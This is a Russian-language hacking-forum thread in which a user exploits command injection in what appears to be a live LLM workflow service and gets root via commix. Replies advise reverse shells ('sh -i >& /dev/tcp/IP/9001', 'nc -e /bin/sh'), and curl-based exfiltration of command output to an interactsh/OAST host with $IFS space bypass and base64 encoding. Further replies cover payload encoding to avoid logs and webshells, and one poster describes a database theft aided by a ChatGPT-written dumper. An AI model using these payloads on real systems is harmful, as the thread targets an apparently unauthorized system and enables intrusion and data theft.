• XSS.stack #1 – первый литературный журнал от юзеров форума

Command injection... os-shell

Отслеживать

PurpleDrunk666

floppy-диск
Пользователь
Регистрация
13.06.2022
Сообщения
9
Решения
1
Реакции
1
Всех приветствую, нужна помощь, окунь выдал Command injection с уязвимостью в inputs.query.
Закинул уязву в commix и раскрутил до pseudo-terminal shell (os-shell)

[09:31:52] [info] POST JSON parameter 'inputs.query' appears to be injectable via (results-based) classic command injection technique.
|_ ;echo PWTBDR$((82+1))$(echo PWTBDR)PWTBDR
POST JSON parameter 'inputs.query' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] >
Pseudo-Terminal Shell (type '?' for available options)
commix(os_shell)

Проблема начинается при использовании os-shell
При вводе команд, ответ выдается в формате mermaid диаграммы, и при выполнении простых команд ( id) , он выдает ответ как раз таки в странном формате
uid=0(root) gid=0(root) groups=0(root) \"]:::result\n`", "usage": {"prompt_tokens": 474, "prompt_unit_price": "0.0", "prompt_price_unit": "0.0", "prompt_price": "0.0", "completion_tokens": 153, "completion_unit_price": "0.0", "completion_price_unit": "0.0", "completion_price": "0.0", "total_tokens": 627, "total_price": "0.0", "currency": "USD", "latency": 2.3949362612329423}, "finish_reason": "stop"}, "status": "succeeded", "error": null, "elapsed_time": 6.471346, "execution_metadata": {"total_tokens": 627, "total_price": "0.0", "currency": "USD"}, "created_at": 1753166330, "finished_at": 1753166337, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "node_started", "workflow_run_id": "76015197-aa67-4122-bf2a-0b150ba96e1f", "task_id": "fbe5fe1f-efdc-47b2-8c0b-214a9339750e", "data": {"id": "92617e18-bd52-444d-b3d9-2bb3052c2420", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": null, "created_at": 1753166337, "extras": {}, "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null, "parallel_run_id": null}} data: {"event": "node_finished", "workflow_run_id": "76015197-aa67-4122-bf2a-0b150ba96e1f", "task_id": "fbe5fe1f-efdc-47b2-8c0b-214a9339750e", "data": {"id": "92617e18-bd52-444d-b3d9-2bb3052c2420", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": {"text": "mermaid\nflowchart LR\n classDef operation fill:#FF5733,stroke:#C70039,color:white\n classDef result fill:#DAF7A6,stroke:#2ECC71\n\n A[\"expr 9000264592 - 936967\"]:::operation --> B[\"9000264592 - 936967 = 8999327625\"]:::result\n C[\"echo PWTBDR$(echo PWTBDR)$(id)$(echo PWTBDR)PWTBDR\"]:::operation --> D[\" uid=0(root) gid=0(root) groups=0(root) \"]:::result\n"}, "process_data": null, "outputs": {"text": "mermaid\nflowchart LR\n classDef operation fill:#FF5733,stroke:#C70039,color:white\n classDef result fill:#DAF7A6,stroke:#2ECC71\n\n A[\"expr 9000264592 - 936967\"]:::operation --> B[\"9000264592 - 936967 = 8999327625\"]:::result\n C[\"echo PWTBDR$(echo PWTBDR)$(id)$(echo PWTBDR)PWTBDR\"]:::operation --> D[\" uid=0(root) gid=0(root) groups=0(root) \"]:::result\n"}, "status": "succeeded", "error": null, "elapsed_time": 0.013434, "execution_metadata": null, "created_at": 1753166337, "finished_at": 1753166337, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "workflow_finished", "workflow_run_id": "76015197-aa67-4122-bf2a-0b150ba96e1f", "task_id": "fbe5fe1f-efdc-47b2-8c0b-214a9339750e", "data": {"id": "76015197-aa67-4122-bf2a-0b150ba96e1f", "workflow_id": "0f3e1d44-fd74-40c3-b9c5-1786dc5bef9e", "sequence_number": 114006, "status": "succeeded", "outputs": {"text": "`mermaid\nflowchart LR\n classDef operation fill:#FF5733,stroke:#C70039,color:white\n classDef result fill:#DAF7A6,stroke:#2ECC71\n\n A[\"expr 9000264592 - 936967\"]:::operation --> B[\"9000264592 - 936967 = 8999327625\"]:::result\n C[\"echo PWTBDR$(echo PWTBDR)$(id)$(echo PWTBDR)PWTBDR\"]:::operation --> D[\" uid=0(root) gid=0(root) groups=0(root)

Из ответа можно понять что я нахожусь по рутом, но при попытке выполнения дальнейших команд, os-shell либо просто отказывается их выполнять
commix(os_shell) > whoami
[09:39:30] [critical] Execution of the 'whoami' command did not return any output.
Либо!!! Он ее выполняет, но в ответ посылает затычку, якобы команда выполнена но, содержимое ответа не выводит
commix(os_shell) > ls
<ls_output> \"]:::result\n`", "usage": {"prompt_tokens": 474, "prompt_unit_price": "0.0", "prompt_price_unit": "0.0", "prompt_price": "0.0", "completion_tokens": 218, "completion_unit_price": "0.0", "completion_price_unit": "0.0", "completion_price": "0.0", "total_tokens": 692, "total_price": "0.0", "currency": "USD", "latency": 10.833195498678833}, "finish_reason": "stop"}, "status": "succeeded", "error": null, "elapsed_time": 10.848803, "execution_metadata": {"total_tokens": 692, "total_price": "0.0", "currency": "USD"}, "created_at": 1753166485, "finished_at": 1753166496, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "node_started", "workflow_run_id": "9a35c265-5f25-4b19-87d4-4ec071706097", "task_id": "9d6df8bb-2b38-47eb-99fc-dfc68b9c3a70", "data": {"id": "7744e7d9-1f2c-4c07-ab81-e63bdadaca74", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": null, "created_at": 1753166496, "extras": {}, "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null, "parallel_run_id": null}} data: {"event": "node_finished", "workflow_run_id": "9a35c265-5f25-4b19-87d4-4ec071706097", "task_id": "9d6df8bb-2b38-47eb-99fc-dfc68b9c3a70", "data": {"id": "7744e7d9-1f2c-4c07-ab81-e63bdadaca74", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": {"text": "mermaid\nflowchart LR\n classDef operation fill:#FF5733,stroke:#C70039,color:white,stroke-width:2px\n classDef result fill:#33FF57,stroke:#2ECC71,color:black,stroke-width:1.5px\n classDef command fill:#3357FF,stroke:#3498DB,color:white,stroke-width:1.5px\n\n Start:::operation --> A[\"expr 9000264592 - 936967\"]:::operation\n A --> B[\"Result: 8999327625\"]:::result\n B --> C[\"echo PWTBDR\"]:::command\n C --> D[\"$(echo PWTBDR)\"]:::command\n D --> E[\"$(ls)\"]:::command\n E --> F[\"$(echo PWTBDR)\"]:::command\n F --> G[\"Final Output: <ls_output> \"]:::result\n"}, "process_data": null, "outputs": {"text": "mermaid\nflowchart LR\n classDef operation fill:#FF5733,stroke:#C70039,color:white,stroke-width:2px\n classDef result fill:#33FF57,stroke:#2ECC71,color:black,stroke-width:1.5px\n classDef command fill:#3357FF,stroke:#3498DB,color:white,stroke-width:1.5px\n\n Start:::operation --> A[\"expr 9000264592 - 936967\"]:::operation\n A --> B[\"Result: 8999327625\"]:::result\n B --> C[\"echo PWTBDR\"]:::command\n C --> D[\"$(echo PWTBDR)\"]:::command\n D --> E[\"$(ls)\"]:::command\n E --> F[\"$(echo PWTBDR)\"]:::command\n F --> G[\"Final Output: <ls_output> \"]:::result\n"}, "status": "succeeded", "error": null, "elapsed_time": 0.014288, "execution_metadata": null, "created_at": 1753166496, "finished_at": 1753166496, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "workflow_finished", "workflow_run_id": "9a35c265-5f25-4b19-87d4-4ec071706097", "task_id": "9d6df8bb-2b38-47eb-99fc-dfc68b9c3a70", "data": {"id": "9a35c265-5f25-4b19-87d4-4ec071706097", "workflow_id": "0f3e1d44-fd74-40c3-b9c5-1786dc5bef9e", "sequence_number": 114012, "status": "succeeded", "outputs": {"text": "`mermaid\nflowchart LR\n classDef operation fill:#FF5733,stroke:#C70039,color:white,stroke-width:2px\n classDef result fill:#33FF57,stroke:#2ECC71,color:black,stroke-width:1.5px\n classDef command fill:#3357FF,stroke:#3498DB,color:white,stroke-width:1.5px\n\n Start:::operation --> A[\"expr 9000264592 - 936967\"]:::operation\n A --> B[\"Result: 8999327625\"]:::result\n B --> C[\"echo PWTBDR\"]:::command\n C --> D[\"$(echo PWTBDR)\"]:::command\n D --> E[\"$(ls)\"]:::command\n E --> F[\"$(echo PWTBDR)\"]:::command\n F --> G[\"Final Output: <ls_output>

Он просто выкинул заглушку: Final Output: <ls_output> , но не дал конкретного ответа.
Про выполнение каких либо,более тяжелых команд я молчу...

Если есть те, кто понимает, в чем проблема, прошу совета!)

Либо, если есть мысли по реализации, пишите, буду пробовать.....
 
Дак выполни бекконнект к себе на сервер ванлайнером и оттуда уже пляши нормально..
www.revshells.com

Online - Reverse Shell Generator

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
www.revshells.com www.revshells.com
 
scoring0 сказал(а):
Дак выполни бекконнект к себе на сервер ванлайнером и оттуда уже пляши нормально..
www.revshells.com

Online - Reverse Shell Generator

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
www.revshells.com www.revshells.com
В этом и проблема, пробовал всевозможные шеллы, их сервер либо режет, либо выдает непонятный ответ и не цепляется в к моему серваку
commix(os_shell) > sh -i >& /dev/tcp/195.2../9001 0>&1 \"]:::output\n`", "usage": {"prompt_tokens": 498, "prompt_unit_price": "0.0", "prompt_price_unit": "0.0", "prompt_price": "0.0", "completion_tokens": 199, "completion_unit_price": "0.0", "completion_price_unit": "0.0", "completion_price": "0.0", "total_tokens": 697, "total_price": "0.0", "currency": "USD", "latency": 3.8970128800719976}, "finish_reason": "stop"}, "status": "succeeded", "error": null, "elapsed_time": 9.543613, "execution_metadata": {"total_tokens": 697, "total_price": "0.0", "currency": "USD"}, "created_at": 1753171087, "finished_at": 1753171096, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "node_started", "workflow_run_id": "9884b907-eecf-4023-b411-e9cbc13e828c", "task_id": "d05fa208-fbad-4471-ba27-0e0a6674fa52", "data": {"id": "5692c413-a5a0-4f83-9932-8742a85161ed", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": null, "created_at": 1753171096, "extras": {}, "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null, "parallel_run_id": null}} data: {"event": "node_finished", "workflow_run_id": "9884b907-eecf-4023-b411-e9cbc13e828c", "task_id": "d05fa208-fbad-4471-ba27-0e0a6674fa52", "data": {"id": "5692c413-a5a0-4f83-9932-8742a85161ed", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": {"text": "mermaid\nflowchart LR\n classDef root fill:#FF5733,stroke:#C70039,color:white,stroke-width:2px,font-weight:bold\n classDef process fill:#33FF57,stroke:#2ECC71,color:black,stroke-width:1.5px\n classDef output fill:#3357FF,stroke:#3498DB,color:white,stroke-width:1px\n\n Start:::root --> Calculation[\"expr 9000264592 - 936967\"]:::process\n Calculation --> Result[\"Result: 8999327625\"]:::output\n Result --> Echo[\"echo MIXMLO\"]:::process\n Echo --> NetworkCall[\"$(sh -i >& /dev/tcp/195.2.71.94/9001 0>&1)\"]:::process\n NetworkCall --> FinalOutput[\" \"]:::output\n"}, "process_data": null, "outputs": {"text": "mermaid\nflowchart LR\n classDef root fill:#FF5733,stroke:#C70039,color:white,stroke-width:2px,font-weight:bold\n classDef process fill:#33FF57,stroke:#2ECC71,color:black,stroke-width:1.5px\n classDef output fill:#3357FF,stroke:#3498DB,color:white,stroke-width:1px\n\n Start:::root --> Calculation[\"expr 9000264592 - 936967\"]:::process\n Calculation --> Result[\"Result: 8999327625\"]:::output\n Result --> Echo[\"echo MIXMLO\"]:::process\n Echo --> NetworkCall[\"$(sh -i >& /dev/tcp/195.2.71.94/9001 0>&1)\"]:::process\n NetworkCall --> FinalOutput[\" \"]:::output\n"}, "status": "succeeded", "error": null, "elapsed_time": 0.015975, "execution_metadata": null, "created_at": 1753171096, "finished_at": 1753171096, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "workflow_finished", "workflow_run_id": "9884b907-eecf-4023-b411-e9cbc13e828c", "task_id": "d05fa208-fbad-4471-ba27-0e0a6674fa52", "data": {"id": "9884b907-eecf-4023-b411-e9cbc13e828c", "workflow_id": "0f3e1d44-fd74-40c3-b9c5-1786dc5bef9e", "sequence_number": 114043, "status": "succeeded", "outputs": {"text": "`mermaid\nflowchart LR\n classDef root fill:#FF5733,stroke:#C70039,color:white,stroke-width:2px,font-weight:bold\n classDef process fill:#33FF57,stroke:#2ECC71,color:black,stroke-width:1.5px\n classDef output fill:#3357FF,stroke:#3498DB,color:white,stroke-width:1px\n\n Start:::root --> Calculation[\"expr 9000264592 - 936967\"]:::process\n Calculation --> Result[\"Result: 8999327625\"]:::output\n Result --> Echo[\"echo MIXMLO\"]:::process\n Echo --> NetworkCall[\"$(sh -i >& /dev/tcp/195.2../9001 0>&1)\"]:::process\n NetworkCall --> FinalOutput[\"
опять никакого внятного ответа и коннекта
 
Exited3n сказал(а):
Или попробуй не создавать --os-shell а сразу пуляй --os-cmd="nc -e /bin/sh YOUR_IP 1234"

Ну реверс себе по ссылке выше подбери
А при попытке через os cmd выполнить , сервер режет команду и ничего не дает выполнить
[11:23:23] [info] Executing user-supplied command 'sh -i >& /dev/tcp/195.2./9001 0>&1'.
[11:23:39] [error] Execution of the 'sh -i >& /dev/tcp/195.2.71.94/9001 0>&1' command did not return any output.
POST JSON parameter 'inputs.query' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] >
Pseudo-Terminal Shell (type '?' for available options)
 
PurpleDrunk666 сказал(а):
опять никакого внятного ответа и коннекта
Так а сеть там есть, получи тут домен https://app[.]interactsh[.]com/#/. Потом попробуй разрезолвить например:
wget example.com
curl example.com
ping example.com
nslookup example.com
хост в том числе dns запросы ловит, так что должно отстучать, убедись что нет проблем с сетью

если HTTP запросы принимает, можешь как query выполнять команды в шелле, типо curl "example.com?$(whoami)"
если пробелы не принимает, то через $IFS байпасни, curl$IFS"example.oast.fun?$(whoami)"
если вывод многострочный, то кодируй в urlencode/base64/etc... curl$IFS"example.oast.fun?$(ls|base64$IFS-w0)"
 
Последнее редактирование:
G1fl3x сказал(а):
Так а сеть там есть, получи тут домен https://app[.]interactsh[.]com/#/. Потом попробуй разрезолвить например:
wget example.com
curl example.com
ping example.com
nslookup example.com
хост в том числе dns запросы ловит, так что должно отстучать, убедись что нет проблем с сетью

если HTTP запросы принимает, можешь как query выполнять команды в шелле, типо curl "example.com?$(whoami)"
если пробелы не принимает, то через $IFS байпасни, curl$IFS"example.oast.fun?$(whoami)"
если вывод многострочный, то кодируй в urlencode/base64/etc... curl$IFS"example.oast.fun?$(ls|base64$IFS-w0)"
Видимо реально с сетью проблемы, потому что на curl отвечает якобы выполнил, и опять заглушку ставит...
commix(os_shell) > curl$IFShttps://dtfddsunwhahtjcehxhqguy4i7ba743tq.oast.fun
<curl_output> \"]:::command\n`", "usage": {"prompt_tokens": 506, "prompt_unit_price": "0.0", "prompt_price_unit": "0.0", "prompt_price": "0.0", "completion_tokens": 234, "completion_unit_price": "0.0", "completion_price_unit": "0.0", "completion_price": "0.0", "total_tokens": 740, "total_price": "0.0", "currency": "USD", "latency": 8.396157829090953}, "finish_reason": "stop"}, "status": "succeeded", "error": null, "elapsed_time": 8.411953, "execution_metadata": {"total_tokens": 740, "total_price": "0.0", "currency": "USD"}, "created_at": 1753193016, "finished_at": 1753193025, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "node_started", "workflow_run_id": "644bb433-2d67-42ea-aca3-356f727c34ed", "task_id": "22e4785b-62ea-4cf5-878e-1962dd6ae732", "data": {"id": "fec420fe-1e18-4705-b6a5-c5abd443d38b", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": null, "created_at": 1753193025, "extras": {}, "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null, "parallel_run_id": null}} data: {"event": "node_finished", "workflow_run_id": "644bb433-2d67-42ea-aca3-356f727c34ed", "task_id": "22e4785b-62ea-4cf5-878e-1962dd6ae732", "data": {"id": "fec420fe-1e18-4705-b6a5-c5abd443d38b", "node_id": "1747027956967", "node_type": "end", "title": "\u7ed3\u675f", "index": 3, "predecessor_node_id": "1747030558518", "inputs": {"text": "mermaid\nflowchart LR\n classDef root fill:#8E44AD,stroke:#2C3E50,color:white,stroke-width:2px,font-weight:bold\n classDef operation fill:#3498DB,stroke:#2980B9,color:white,stroke-width:1.5px\n classDef command fill:#2ECC71,stroke:#27AE60,color:white,stroke-width:1px\n\n ExpressionEvaluation:::root --> Subtraction[\"9000264592 - 936967\"]:::operation\n ExpressionEvaluation --> CommandExecution[\"echo EIAFVL$(...)\"]:::command\n \n Subtraction --> Result[\"Result: 8999327625\"]:::operation\n \n CommandExecution --> SubCommand1[\"echo EIAFVL\"]:::command\n CommandExecution --> CurlCommand[\"curl$IFShttps://...\"]:::command\n CommandExecution --> SubCommand2[\"echo EIAFVL\"]:::command\n CommandExecution --> FinalOutput[\" <curl_output> \"]:::command\n"}, "process_data": null, "outputs": {"text": "mermaid\nflowchart LR\n classDef root fill:#8E44AD,stroke:#2C3E50,color:white,stroke-width:2px,font-weight:bold\n classDef operation fill:#3498DB,stroke:#2980B9,color:white,stroke-width:1.5px\n classDef command fill:#2ECC71,stroke:#27AE60,color:white,stroke-width:1px\n\n ExpressionEvaluation:::root --> Subtraction[\"9000264592 - 936967\"]:::operation\n ExpressionEvaluation --> CommandExecution[\"echo EIAFVL$(...)\"]:::command\n \n Subtraction --> Result[\"Result: 8999327625\"]:::operation\n \n CommandExecution --> SubCommand1[\"echo EIAFVL\"]:::command\n CommandExecution --> CurlCommand[\"curl$IFShttps://...\"]:::command\n CommandExecution --> SubCommand2[\"echo EIAFVL\"]:::command\n CommandExecution --> FinalOutput[\" <curl_output> \"]:::command\n"}, "status": "succeeded", "error": null, "elapsed_time": 0.01543, "execution_metadata": null, "created_at": 1753193025, "finished_at": 1753193025, "files": [], "parallel_id": null, "parallel_start_node_id": null, "parent_parallel_id": null, "parent_parallel_start_node_id": null, "iteration_id": null}} data: {"event": "workflow_finished", "workflow_run_id": "644bb433-2d67-42ea-aca3-356f727c34ed", "task_id": "22e4785b-62ea-4cf5-878e-1962dd6ae732", "data": {"id": "644bb433-2d67-42ea-aca3-356f727c34ed", "workflow_id": "0f3e1d44-fd74-40c3-b9c5-1786dc5bef9e", "sequence_number": 114334, "status": "succeeded", "outputs": {"text": "`mermaid\nflowchart LR\n classDef root fill:#8E44AD,stroke:#2C3E50,color:white,stroke-width:2px,font-weight:bold\n classDef operation fill:#3498DB,stroke:#2980B9,color:white,stroke-width:1.5px\n classDef command fill:#2ECC71,stroke:#27AE60,color:white,stroke-width:1px\n\n ExpressionEvaluation:::root --> Subtraction[\"9000264592 - 936967\"]:::operation\n ExpressionEvaluation --> CommandExecution[\"echo EIAFVL$(...)\"]:::command\n \n Subtraction --> Result[\"Result: 8999327625\"]:::operation\n \n CommandExecution --> SubCommand1[\"echo EIAFVL\"]:::command\n CommandExecution --> CurlCommand[\"curl$IFShttps://...\"]:::command\n CommandExecution --> SubCommand2[\"echo EIAFVL\"]:::command\n CommandExecution --> FinalOutput[\" <curl_output>
Есть мысли что тогда сделать?
 
r4cket3er сказал(а):
делай вебшелл и через него работай как вариант
Пробовал уже метасплойт шеллы, тоже не получается подлить и выполнить...
 
PurpleDrunk666 сказал(а):
Есть мысли что тогда сделать?
попробуй нагрузку в запросе энкодить, мне кажется тебе многострочный вывод не отдает просто, либо он при ошибке фейлится, можно поток перенаправлять и шифровать в однострочник, выполни ip a 2>&1 | base64 -w0 и скинь че там по сетевым интерфейсам
 
Последнее редактирование:
scoring0 сказал(а):
Дак выполни бекконнект к себе на сервер ванлайнером и оттуда уже пляши нормально..
www.revshells.com

Online - Reverse Shell Generator

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
www.revshells.com www.revshells.com
Идея бэкконнекта лежит на поверхности, да.
Однако буквально недавно VM за NAT+firewall видал где всё режется наружу - ни скачать ничего wget/curl ни реверс шелл сделать, ни даже реверс шелл неткатом по UDP, пинги (ICMP) тоже наружу не ходят, зато по локалке через вебшелл лазай нихочу даже nmap есть (эва оно как), базу оттуда пёр как дурак без mysqldump'а (а нет его там и не залить) на PHP написал (спасибо чатджипити, за 5 минут) дампер в base64 куски порезал и так пёр (и заливал дампер тоже base64 кусками).
 
PurpleDrunk666 сказал(а):
Если есть те, кто понимает, в чем проблема, прошу совета!)
Либо, если есть мысли по реализации, пишите, буду пробовать.....
1. Попробовать reverse shell - первая мысль, и обычно это прокатывает.
2. Если не все команды, то возможно надо urlencode делать, я обычно всегда стараюсь пэйлоад в браузере сделать encodeURIComponent(btoa("тут пэйлоад")) , а удалённо на вебшелле base64 раскодировать перед выполнением - и менее палевно в логах получается и гарантированно пэйлоад долетает не фачится по дороге.

p.s. список всех доступных в системе (*nix) команд обычно получить можно compgen -c выполнив.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх